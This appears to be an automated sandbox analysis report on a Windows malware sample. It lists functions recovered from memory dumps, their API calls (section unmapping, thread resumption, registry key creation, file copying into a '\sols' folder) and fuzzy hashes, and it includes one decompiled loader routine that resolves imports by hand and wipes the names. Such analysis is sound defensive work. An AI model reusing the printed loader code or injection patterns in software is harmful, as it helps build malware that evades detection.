    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1F61, Relevance: 10.6, APIs: 7, Instructions: 110 Total matches: 25memoryfilestring
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
